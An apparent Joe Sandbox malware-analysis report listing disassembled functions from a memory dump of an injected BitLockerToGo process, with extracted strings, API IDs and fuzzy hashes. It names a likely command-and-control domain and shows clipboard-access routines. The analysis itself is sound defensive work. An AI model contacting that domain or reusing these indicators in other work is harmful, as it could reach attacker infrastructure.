                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  • Opcode ID: c2ab398bce464029ae1143e04964b67ccca3b2c7882dac11a027af8e2bf7c4fe
                                                                                                                  • Instruction ID: 90214785a3c6bd59ab25897dc5d05d16556cf3df02cbc6e8bf56c323d76c7450
                                                                                                                  • Opcode Fuzzy Hash: c2ab398bce464029ae1143e04964b67ccca3b2c7882dac11a027af8e2bf7c4fe
                                                                                                                  • Instruction Fuzzy Hash: 84C001383E0302BAF2324B14AC1BF842624A746F02F202060B341BC0E08AE26A60AA09
                                                                                                                  Function 0043FAB2 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 325 43fab2-43fac6 RtlAllocateHeap
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043FAB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: b15e10812584febcd0a50b8dfea056ba7e77aaa368a92f6e9d712b7b4028ab1f
                                                                                                                  • Instruction ID: 62b8da98c4e9c927b26d9646e5227c369ff2dec8b8e5acd4a8074fb57565bbf6
                                                                                                                  • Opcode Fuzzy Hash: b15e10812584febcd0a50b8dfea056ba7e77aaa368a92f6e9d712b7b4028ab1f
                                                                                                                  • Instruction Fuzzy Hash: 4EB092372A42059AE9101B99BC45B49B728EB8022BF104936F60884451816394294669

                                                                                                                  Non-executed Functions

                                                                                                                  Function 0043A9AD Relevance: 79.1, Strings: 63, Instructions: 375COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ $!$#$%$'$($)$+$,$-$/$/$1$1$3$3$4$5$7$7$7$9$9$;$=$=$?$A$A$B$C$E$G$I$K$K$M$M$N$N$O$P$P$U$Y$[$]$^$`$a$k$l$m$n$p$q$t$v$w$z$}$~
                                                                                                                  • API String ID: 0-3033080934
                                                                                                                  • Opcode ID: 9527aa7c6c163d55bd5c1723322880a53ab8ae9a105bdc3777b29beb39728b9a
                                                                                                                  • Instruction ID: bc0d86b789bb8b96a7cc1a38f1ddabbea94a259dec7e1919b431d61bf3f5abc8
                                                                                                                  • Opcode Fuzzy Hash: 9527aa7c6c163d55bd5c1723322880a53ab8ae9a105bdc3777b29beb39728b9a
                                                                                                                  • Instruction Fuzzy Hash: 71223E2190C7EA89DB32C63C8C487CDBE615B27224F0847D9D1F96B2D2D7B50A85CB66
                                                                                                                  Function 0043A24C Relevance: 40.3, Strings: 32, Instructions: 292COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "$"$%$)$*$,$0$0$1$1$2$7$8$:$<$<$=$>$@$A$C$G$I$I$K$M$O$S$W$w$z$|
                                                                                                                  • API String ID: 0-3015680060
                                                                                                                  • Opcode ID: 8bf6ac43211f0ced01c8085c9ff0e206bc1b6d4051f36b1960a1a1f2b6a318b1
                                                                                                                  • Instruction ID: 20cc0c7cefd14a6b4221435af9dcf42fe9c836e733c46325e5a10822d8806a0d
                                                                                                                  • Opcode Fuzzy Hash: 8bf6ac43211f0ced01c8085c9ff0e206bc1b6d4051f36b1960a1a1f2b6a318b1
                                                                                                                  • Instruction Fuzzy Hash: D2D1C231D087D98EDB22C6BC88083DDBFA15B66324F184399D4E96B3E2C3794946CB56
                                                                                                                  Function 00430300 Relevance: 25.8, APIs: 2, Strings: 11, Instructions: 3020COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: )S$Q$-$#>$E)[m$EXC^$Ew@u$J(Z$JBWG$VBB$ZZS\$Z^"N$_]
                                                                                                                  • API String ID: 0-732294183
                                                                                                                  • Opcode ID: 2c6b6dec1a3aeca8c0cde2012fb65f00d51253ab9b46e7028a77a8efb1de7235
                                                                                                                  • Instruction ID: 43c8bfd4d0ffc52c87cbebf0dc52430d854cff4809ba0d7369a45c1cdb2704fb
                                                                                                                  • Opcode Fuzzy Hash: 2c6b6dec1a3aeca8c0cde2012fb65f00d51253ab9b46e7028a77a8efb1de7235
                                                                                                                  • Instruction Fuzzy Hash: 9A232771604B818FE3258F35C4607A3BBE2EF96304F18996EC0EB8B792D779A405CB55
                                                                                                                  Function 00436E30 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 113clipboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                  • String ID: <$F$G$]$c
                                                                                                                  • API String ID: 2832541153-1818401840
                                                                                                                  • Opcode ID: 5290a97ecd0775b6401821c6e7be433f94010b661b7b8b225101acbd93d1f163
                                                                                                                  • Instruction ID: 86b6270dbdddb5e9962f20051e2dfdb3068328bc0b9f684ec1422ae9638b5b2e
                                                                                                                  • Opcode Fuzzy Hash: 5290a97ecd0775b6401821c6e7be433f94010b661b7b8b225101acbd93d1f163
                                                                                                                  • Instruction Fuzzy Hash: DA41C27150C3828ED301AF7CD44836FBFE05B9A324F058A2EE5D5873D1D678854987AB
                                                                                                                  Function 00436FC0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem
                                                                                                                  • String ID: $ yC$+}C$;~C$DyC$O}C$cxC$kzC
                                                                                                                  • API String ID: 4116985748-4279269959
                                                                                                                  • Opcode ID: 62a666965452f5991cf9a04505432304e1f1cbef11720978f5838b7a7d0cd7e0
                                                                                                                  • Instruction ID: 87ccb182078abfdf045ea6081c633fa90ea4dbde24179ff630f0f79226f70ea9
                                                                                                                  • Opcode Fuzzy Hash: 62a666965452f5991cf9a04505432304e1f1cbef11720978f5838b7a7d0cd7e0
                                                                                                                  • Instruction Fuzzy Hash: EED117B49093808BE7B0DF15C588B9FBBF0BB85348F108A1EE5D94B254D7B85598CB4B
                                                                                                                  Function 00420870 Relevance: 16.4, Strings: 12, Instructions: 1434COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $0ONM$8$9:;4$@_^e$lkji$rM$xwv-$|-[b$|{zy$usZ$
                                                                                                                  • API String ID: 0-3994231490
                                                                                                                  • Opcode ID: ec1d6f27a190a20f1aa7ba43da139ff415c008c75ce141617656b0070c99a0f0
                                                                                                                  • Instruction ID: 6fad7d84e2efd6fec4561277c4c20d8c72665fb25a47927a94e0f2c33ff226fc
                                                                                                                  • Opcode Fuzzy Hash: ec1d6f27a190a20f1aa7ba43da139ff415c008c75ce141617656b0070c99a0f0
                                                                                                                  • Instruction Fuzzy Hash: 1CA2117020C3918BD724CF29D4907ABBBE2EFE6304F58896DE4C58B392D7788545CB96
                                                                                                                  Function 00423FA0 Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: UB$OB$9MB$GOB$GTB$eSB$jTB$pOB${RB
                                                                                                                  • API String ID: 0-3236151770
                                                                                                                  • Opcode ID: d673b7c42c8ee394b6f5a61ea78a5438d9ff89b3face7e0a3ea1da0b3fd18ed5
                                                                                                                  • Instruction ID: 8547444d356b2edf2a5589af1f8df7404c8b6a2043747b9cbcbc9635f5e71319
                                                                                                                  • Opcode Fuzzy Hash: d673b7c42c8ee394b6f5a61ea78a5438d9ff89b3face7e0a3ea1da0b3fd18ed5
                                                                                                                  • Instruction Fuzzy Hash: 9A728DB0509F818ED3668B3C9849793BFD59B6A324F084A5EE0FE8B3D2C7756101C766
                                                                                                                  Function 00401000 Relevance: 10.5, Strings: 7, Instructions: 1740COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                                                                                                  • API String ID: 0-2517803157
                                                                                                                  • Opcode ID: d152c204e7b30029da98014d98c16f61d2cd7a21374bb6e99806c66b45573a0f
                                                                                                                  • Instruction ID: b7b7424dd41788c4f5bd300ad1c28beee6fe6829a1e2288f34b088ad8562c2fc
                                                                                                                  • Opcode Fuzzy Hash: d152c204e7b30029da98014d98c16f61d2cd7a21374bb6e99806c66b45573a0f
                                                                                                                  • Instruction Fuzzy Hash: 57D2D0716083418FD714CF29C48476BBBE2AF89304F188A3EE499AB3D1D779D945CB86
                                                                                                                  Function 0041E760 Relevance: 8.6, Strings: 6, Instructions: 1116COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .[6$RA$ZPZi$~d~c$~$
                                                                                                                  • API String ID: 0-4246915511
                                                                                                                  • Opcode ID: 8a876640d93e3db8f478919f90ceb5779d35d44dd2e6367ed19de8d9becafda2
                                                                                                                  • Instruction ID: f26921d1b774c1171388e809b27ab1d8db0597545e4c44ea9a679c2bcf3fb156
                                                                                                                  • Opcode Fuzzy Hash: 8a876640d93e3db8f478919f90ceb5779d35d44dd2e6367ed19de8d9becafda2
                                                                                                                  • Instruction Fuzzy Hash: 6F8236B5909340DBD720CF25D891BABB7E1FF85304F084A3EE88997391E7399845CB5A
                                                                                                                  Function 00401311 Relevance: 8.4, Strings: 6, Instructions: 945COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0$0$0$@$d$i
                                                                                                                  • API String ID: 0-2683514064
                                                                                                                  • Opcode ID: 84e80e362cb28152ed66a849b45e0140097f4ba56a0b06fea32ea5d2e879a5b0
                                                                                                                  • Instruction ID: 512d34ccc82a77e582c652336fe38cdedd01620c8fe1c1faa7ca20eaba561f11
                                                                                                                  • Opcode Fuzzy Hash: 84e80e362cb28152ed66a849b45e0140097f4ba56a0b06fea32ea5d2e879a5b0
                                                                                                                  • Instruction Fuzzy Hash: 6672D27160C3418BD719CF28C69476BBBE1AB89304F14897EE8C5A73D1D3B8D945CB86
                                                                                                                  Function 004014C0 Relevance: 7.9, Strings: 6, Instructions: 448COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                                                  • API String ID: 0-925659942
                                                                                                                  • Opcode ID: 8427058d751187ff01546108bd99107437b7f22f2a0a8ca23830413179c520ad
                                                                                                                  • Instruction ID: a94ae675887b7b03491fb6eb80606b310f5e3cb8700f3d4feda2a12fc40df389
                                                                                                                  • Opcode Fuzzy Hash: 8427058d751187ff01546108bd99107437b7f22f2a0a8ca23830413179c520ad
                                                                                                                  • Instruction Fuzzy Hash: FFF1817060C3828BC718CE29C59466FBBE2AFD9304F188A3EE495A73D1D778D945CB46
                                                                                                                  Function 0040135C Relevance: 7.9, Strings: 6, Instructions: 393COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                                                  • API String ID: 0-854689426
                                                                                                                  • Opcode ID: f379f27dd95fc4024c2e4158d430724ef6ebea1463502d6f1c60e9f9be2936e4
                                                                                                                  • Instruction ID: 7bf8a449e51c73537fa547982d22261e868c7bc354e849baa76ce27a9e5437c2
                                                                                                                  • Opcode Fuzzy Hash: f379f27dd95fc4024c2e4158d430724ef6ebea1463502d6f1c60e9f9be2936e4
                                                                                                                  • Instruction Fuzzy Hash: FDE1B47060C7828FC719CE29C59026AFBE2AFD9304F088A6EE4D5973D2D778D905CB46
                                                                                                                  Function 0040D3D0 Relevance: 7.8, Strings: 6, Instructions: 293COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: AKKD$FOYC$No$QBYF$]_#"$}#
                                                                                                                  • API String ID: 0-3146139966
                                                                                                                  • Opcode ID: 5f1ffba9f1033bf396acbbb8aab2a2ea65e55524da9d3b6b5d8213ca2750a204
                                                                                                                  • Instruction ID: db70b59a852bfcba8b1849055af727ae04cd91f75e39da84bfcef201b843e50f
                                                                                                                  • Opcode Fuzzy Hash: 5f1ffba9f1033bf396acbbb8aab2a2ea65e55524da9d3b6b5d8213ca2750a204
                                                                                                                  • Instruction Fuzzy Hash: C8A1EF715083918FD321CF69C88076BBBE1AFD6314F1849ADE4D49B382D739C90ACB96
                                                                                                                  Function 0042C966 Relevance: 7.7, Strings: 6, Instructions: 158COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: *uw$K9$LS$Oz$d.$lm
                                                                                                                  • API String ID: 0-3718025769
                                                                                                                  • Opcode ID: 59321da290f06774b58e00159680dc27d8376244bdbe55f11e3ecf5bc6ab10c0
                                                                                                                  • Instruction ID: aa8d91625d0bfc1b78dc98329e27c407c402debf2ce52bbd29807d59caab8c83
                                                                                                                  • Opcode Fuzzy Hash: 59321da290f06774b58e00159680dc27d8376244bdbe55f11e3ecf5bc6ab10c0
                                                                                                                  • Instruction Fuzzy Hash: 6351BBB5A183409FE324DF61D88175FBBE0EB94704F548A2DFA855B3A1D7B4CA018B87
                                                                                                                  Function 0042B2D0 Relevance: 6.6, Strings: 5, Instructions: 387COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: iw$ws$z{$$
                                                                                                                  • API String ID: 0-2826843231
                                                                                                                  • Opcode ID: ff7a5dc977007a1127e2ecc6de89bc1388f19525acf465af774ca48c15798a98
                                                                                                                  • Instruction ID: 8f9bf94c91200d06c555ad50806baf3fccc19e5f47cd2133d8a877e7e42494e2
                                                                                                                  • Opcode Fuzzy Hash: ff7a5dc977007a1127e2ecc6de89bc1388f19525acf465af774ca48c15798a98
                                                                                                                  • Instruction Fuzzy Hash: 73D1FDB8608380DFE7249F64E890B6BBBF1FB96304F54492DF1C99B251D7789801CB86
                                                                                                                  Function 00427E5D Relevance: 5.9, Strings: 4, Instructions: 876COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: VY$$$
                                                                                                                  • API String ID: 0-3266629044
                                                                                                                  • Opcode ID: 50f8a55d331de74ace66d6349c916f154129c77fffd3cbc13d1687773f1047c6
                                                                                                                  • Instruction ID: 1021bc0ca3887d432af3b2901f56886f669b45b4b6b5a5b859807f370d6ef68d
                                                                                                                  • Opcode Fuzzy Hash: 50f8a55d331de74ace66d6349c916f154129c77fffd3cbc13d1687773f1047c6
                                                                                                                  • Instruction Fuzzy Hash: C042E176B086118FD718CF28DC9166AB3E2FB89314F49897DE89687391EB78D801CB45
                                                                                                                  Function 00444A30 Relevance: 5.8, Strings: 4, Instructions: 848COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "RD$4KD$\ND$rMD
                                                                                                                  • API String ID: 0-1732920524
                                                                                                                  • Opcode ID: 4d3c19c3f4da57b2590f4573f130325eb8a086e6cdbc2473a1ab1d53db6def43
                                                                                                                  • Instruction ID: 1a5a24805f05648a130e676193dd6ad3403e2cd9d3cc288eef4423998c049f1c
                                                                                                                  • Opcode Fuzzy Hash: 4d3c19c3f4da57b2590f4573f130325eb8a086e6cdbc2473a1ab1d53db6def43
                                                                                                                  • Instruction Fuzzy Hash: 06424739A19215CFDB08CF28D8906AEB7E2FB89311F1A857DC84697392D738E951CF44
                                                                                                                  Function 004288F0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 481COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: B6t/$Q-_
                                                                                                                  • API String ID: 0-448327369
                                                                                                                  • Opcode ID: 56f8a0b495eb7bf35a7f5916a4d52c4752c3ca9e08f8a601e677b64993e09f1a
                                                                                                                  • Instruction ID: 238d6bb67dd9a6adede2b04acad1910b28b7e4486ea04f07671800663136a3f3
                                                                                                                  • Opcode Fuzzy Hash: 56f8a0b495eb7bf35a7f5916a4d52c4752c3ca9e08f8a601e677b64993e09f1a
                                                                                                                  • Instruction Fuzzy Hash: 31F1CAB46093409FD3109F65E89266FBBF0EB92354F40892DF4D58B391E778890ACB97
                                                                                                                  Function 0040EDF0 Relevance: 5.4, Strings: 4, Instructions: 412COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &\.&$JKJI$`$vKrz3Hq72H1UNZmiSDnI_ARtZuyd8ck1abtebasc0mE-1728813636-0.0.1.1-/api
                                                                                                                  • API String ID: 0-273589858
                                                                                                                  • Opcode ID: 157c1b43775b95e4d34064cd9005097fe3676c683add4e305bf64de8683d8258
                                                                                                                  • Instruction ID: 6e39ea319d6867e908e14c633c4e9157087ffda1fd339f3026cf0b6e25ae8a4e
                                                                                                                  • Opcode Fuzzy Hash: 157c1b43775b95e4d34064cd9005097fe3676c683add4e305bf64de8683d8258
                                                                                                                  • Instruction Fuzzy Hash: 7ED1073560C3818BD324CF24C4503AFBBE1ABD2314F18C97EE4D96B795D779890A8B86
                                                                                                                  Function 00421BC0 Relevance: 5.2, Strings: 3, Instructions: 1487COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: x{$s}${ze
                                                                                                                  • API String ID: 0-1786024099
                                                                                                                  • Opcode ID: b17a912bf400f75f3107a9a9ebc8ef62f0dedac1d1e7f66b4a33f6ce89a6d692
                                                                                                                  • Instruction ID: 5b03512489393e253462f48631ac28bae70ce3994dd56f5bf618561b46874b1c
                                                                                                                  • Opcode Fuzzy Hash: b17a912bf400f75f3107a9a9ebc8ef62f0dedac1d1e7f66b4a33f6ce89a6d692
                                                                                                                  • Instruction Fuzzy Hash: AC9274B4A04311DBC710CF24D89266BB7F1FF95314F588A6DE8818B391E778D902CB9A
                                                                                                                  Function 004116B1 Relevance: 5.2, APIs: 2, Strings: 1, Instructions: 651COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Uninitialize
                                                                                                                  • String ID: sergei-esenin.com
                                                                                                                  • API String ID: 3861434553-2126347791
                                                                                                                  • Opcode ID: e6261f2f38a1d8d95e752aac16dfc4450d8229a36cc246c672b33b6cde1465a6
                                                                                                                  • Instruction ID: c80a04676bf269714e015c999df924d93101167496c685b60fbc1a9d35427808
                                                                                                                  • Opcode Fuzzy Hash: e6261f2f38a1d8d95e752aac16dfc4450d8229a36cc246c672b33b6cde1465a6
                                                                                                                  • Instruction Fuzzy Hash: 6B120FB1209B829FD325CF26C4906A2BBF2FF96300B18869DC0D64BB55D739B456CF94
                                                                                                                  Function 004256A6 Relevance: 4.6, Strings: 3, Instructions: 828COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: R|nA$R|nA$rVB
                                                                                                                  • API String ID: 0-2358576588
                                                                                                                  • Opcode ID: c3eec3e1ed8f9f0a56290a846e43bdd826569f4b797f3341d1f898cb92a66c88
                                                                                                                  • Instruction ID: a991a7180cf83b2a4cb3638bf2f6611714130f264e01a5d54ac642b58a816b9d
                                                                                                                  • Opcode Fuzzy Hash: c3eec3e1ed8f9f0a56290a846e43bdd826569f4b797f3341d1f898cb92a66c88
                                                                                                                  • Instruction Fuzzy Hash: EE2223B0610721CBCB24CF24C892677B7B1FF62320B99964DD8925F795E338E851CB98
                                                                                                                  Function 00444B60 Relevance: 4.5, Strings: 3, Instructions: 755COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "RD$\ND$rMD
                                                                                                                  • API String ID: 0-3334719976
                                                                                                                  • Opcode ID: 01e16901644d2ca8b748b99b178f8911db8f41e31a6beeb8a55caf68390c893c
                                                                                                                  • Instruction ID: 04e00bfccc30c5a99cb544d2224f609fd716ca31234d7d79009938c757915f36
                                                                                                                  • Opcode Fuzzy Hash: 01e16901644d2ca8b748b99b178f8911db8f41e31a6beeb8a55caf68390c893c
                                                                                                                  • Instruction Fuzzy Hash: 34222536A19215CFDB08CF28D8906AEB7E2FB89311F1A857DC84597392D738E951CF84
